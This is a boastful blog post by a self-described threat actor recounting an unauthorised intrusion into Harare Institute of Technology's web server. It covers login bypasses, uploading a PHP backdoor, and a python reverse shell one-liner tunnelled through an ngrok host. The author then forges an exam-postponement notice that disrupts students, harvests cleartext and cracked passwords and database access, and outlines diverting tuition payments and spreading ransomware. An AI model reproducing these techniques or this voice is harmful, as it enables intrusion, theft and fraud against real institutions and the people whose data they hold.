How I Easily Hacked Harare Institute of Technology (The Simplicity Will Blow Your Mind!)

n this article, I will be writing about a shady Institute, Harare Institute of Technology, with beyond horrible security practices. I think that the people at @HIT will equally appreciate my reporting on this. Let us prove that I was indeed able to hack into HIT web server real quick.

The above snapshots clearly show we were able to access their Mysql database. Still, have doubts and want some more proof? Below is a screenshot of HIT’s root web directory:

Enough of the proof, I will not be disclosing any sensitive information on this server.

In short, we OWN them, We have all their data.

TL;DR How it happened

So now you might be curious to know how this happened, well! stay with me I will be explaining how I performed all the HACKS. Before we commence, get yourself a cup of coffee☕. Well!, you got your cup of coffee☕, now let’s get started.

HIT website has this cool feature that allows the procurement team to post Request for Quotations (RFQs). The staff would log in to an admin panel with a username and password, secure enough 😂. They then go on to post an RFQ with a title, due date, and a document that has more details about the RFQ and this is where it gets interesting, but first, let’s bypass the login

A Login Form Is Secure, Right? WRONG!

First I tried a random username and password and it threw an authentication error still secure enough. Next moved on to find out how the form was being submitted, can I exploit it somehow.

The form was submitted via ajax to the .php file but I noticed something weird about the JavaScript code, after checking for successful login is redirected to the admin but it did not set any cookies. So I tried the redirected endpoint in a new tab and voila! We have an admin page

Initial Foothold

Now back to our RFQ documents. First I created my own RFQ entry and uploaded a pdf file and it worked just fine. So tried to upload a different file instead I uploaded a PHP script with a simple echo inside and to my surprise, well not surprised really, the file was uploaded and I was able to run it. I got a remote code execution!

Getting A Reverse Shell

Now it was time to get the infamous reverse shell. I uploaded the PHP reverse shell from pentest monkey but I couldn’t get a shell, the webmaster did a very good job😎 of making sure `PHP` cannot run any shell commands. Next, I used msfvenom to generate a raw reverse PHP shell but that too was a bust

After hours of scouring the internet I came across this web shell class that claimed to bypass any restrictions on PHP <= 7.4, I uploaded that one I got a web shell but that wasn’t useful on its own.

So what I did next was to test if I was able to run any system commands using the `web shell`. The first thing I did was to list the contents of the webroot directory. Voila! was able to get OS command Injection.

Again this wasn’t enough, for me to get a reverse shell, I needed either python or PHP installed on the system, so I went on and checked to see if python is available by injecting this command:

$ which python

The above snippet clearly shows that python was indeed installed on the system. Now, what next?

Tunneling Works All The Time

Two gems💎 already found (`python`, and `OS command Injection`), now I was left with one last gem to solve the mystery. I need some sought of way to tunnel a connection from a public URL to my application running locally, so for this ngrok was the last gem💎 I need. Honestly, it sounds pretty cool, right? So I fire ngrok up ngrok and open my local `TCP port 443`. well you know what, why don’t I show you?

$ ngrok tcp 443

You can see I have a forwarded port and tunnel set up from port 443 (TCP) on my localhost, now publicly available at tcp://4.tcp.ngrok.io:17678!

Now anyone on the Internet can connect back to me.

Gaining Remote Control

After this, I set up a local netcat listener to listen for incoming connection and carefully craft a python reverse shell:

Netcat listener listening on port 443 on my localhost:

$ nc -nlvp 433

My netcat hungrily waiting for incoming connection

Carefully crafted python reverse shell with my ngrok tunnel public host and port:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("4.tcp.ngrok.io", 11003));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(\["/bin/sh","-i"]);'

Popping The Shell

I then went on injecting the above python reverse shell on the vulnerable command injection endpoint in other words the `web shell` I uploaded and voila!

I’M IN

Post Exploitation

Upgrade My Dumb Shell to a Fully Interactive Shell

The shell I first got was a dump shell, if you are a Linux user you probably know what a dump shell is. Dumpshells are limited, lacking the full power and functionality of a proper terminal. Certain things don’t work in these environments, and they can be troublesome to work with. Luckily, with a few commands, I was able to upgrade to a fully interactive shell with all the bells and whistles.

python -c "import pty; pty.spawn('/bin/bash')"

If you want to know more about the drawbacks `dump shell` have checkout this [article](https://null-byte.wonderhowto.com/how-to/upgrade-dumb-shell-fully-interactive-shell-for-more-flexibility-0197224/)

Let’s try out something interesting

Okay I know what you’re thinking, we get it, you hacked the webserver so what? Well unfortunately escalation to root was a bust but with time I’ll figure it out. So I thought what can I do with this, during that time there was an FBI hack by pompurine which sent kinda scary emails to users:

The FBI Got Hackd

So thought why don’t I try something like that.

During this time, the institute was scheduled for exams in 3 days. There was speculation that exams might be postponed. There was an opportunity to try something here! Time to put my Photoshop skills to the test. HIT website has yet another awesome feature that allows the administration to post notices to students and other stakeholders. I took an old exams notice and rescheduled exams a month ahead and modified the HTML code to display my pwned notice. For the next couple of days, there was chaos no one could tell what was genuine or what isn’t. Some students even decided to leave the campus after hearing the great news. I suspect even the lecturers didn’t come to work the following day. In response to this, the institute sent text messages to students reassuring them that exams will continue as scheduled. And unfortunately, they fixed the vulnerability.

This wasn’t our end

Yes, the HIT guys managed to fix it by removing write access to the folder where notices were kept. They also did a great job of fixing the login form bypass vulnerability. But little did they know that by fixing vulnerabilities they’re just creating new puzzles for us to solves which makes our playground more interesting and fascinating. So this didn’t stop us from continuing to explore other attack vectors.

Bypass The Login Form Again!

Going back to our login form again, I thought of viewing the source, they commented out the vulnerable JavaScript code! There was no other way to access the restricted pages except with a username and password, well, at least that’s what HIT believes. The login form submitted a request to a .php file but this time they validated the session server. When I entered the wrong credential it gave an `alert(‘wrong password’)`, what was happening here? There was no other JavaScript code when I inspected the source code. In my attempts to figure out what exactly happens after submitting the form, I fired up BurpSuite and intercepted both the request and the response and there it was! At the beginning of the response, there was the javascript that was throwing the wrong password error. What!? was curious about this was the placement of the javascript, the `lexical position` to be more technical.

I mean who puts <script> tags before even opening the HTML5 doctype declaration`. I figured there has to be some PHP code checking the credentials at the very beginning of the file and echoing that weird javascript.

I tried to intercept the response to the restricted page and as I suspected, javascript the code at the beginning handled the redirecting. I just removed the `javascript` and forwarded the response to the browser again and viola! I’m in!

I was welcomed with a nice-looking Dashboard that allows me to create new accounts (add users), view, edit, delete and upload records. Instead of intercepting every request/response with Burp I just disabled Javascript on my browser I was able to visit and restrict endpoints without any authentication.

Dashboard

Adding users

Edit & Delete Records

Upload records

This allowed me to inject another PHP backdoor and get another reverse shell.

Back To Our Reverse Shell

Now have my PHP backdoor uploaded again it was time to do some deep internal enumeration, I have to hunt for that “little thing” as “the devil is in the detail“.

After hours of enumerating I found a lot of juicy stuff, which includes confidential Information & Users (for different services), clear text passwords, passwords that were encrypted with weak MD5 harsh which I was able to decrypt within a matter of seconds, sensitive files & databases, configurations files, and the list goes on forever.

Databases!

configs

Login to MySql

In the enumeration process I was able to get hold of the `Mysql` user and password, so tried to log in and I’m in:

Tried viewing a few database records and to my surprise, the users we created were there.

Voting system

Closing thoughts

Organizations in Zimbabwe don’t take information security seriously. This incident shows that even the slightest hack can have serious consequences. To illustrate, let’s take a look at what I could have done instead of a prank. I love the cool features this website offers, online payments is my favorite. Since I could modify the HTML code I could just replace the! Paynow merchant configuration with my own and each time a payment is made, it’s to my account and this could go unnoticed for at least a month. They will simply assume the money is ‘hanging’, it does that sometimes. As of now, tuition is ZWL 42 148. On average, 2 students use paynow a day that’s ZWL 84 249 per day. In 30 days that’s ZWL 2 528 880! Using the current interbank exchange that’s US $21 990 just lost and I didn’t even need root access! Apart from this, the server has a lot of sensitive information which includes people who applied for jobs at the institute, student details that can be used for malicious activities. In short, there are a lot of malicious I could have done, like spreading ransomware on their network.

Thanks for reading! More blog posts coming soon from your favorite threat actors.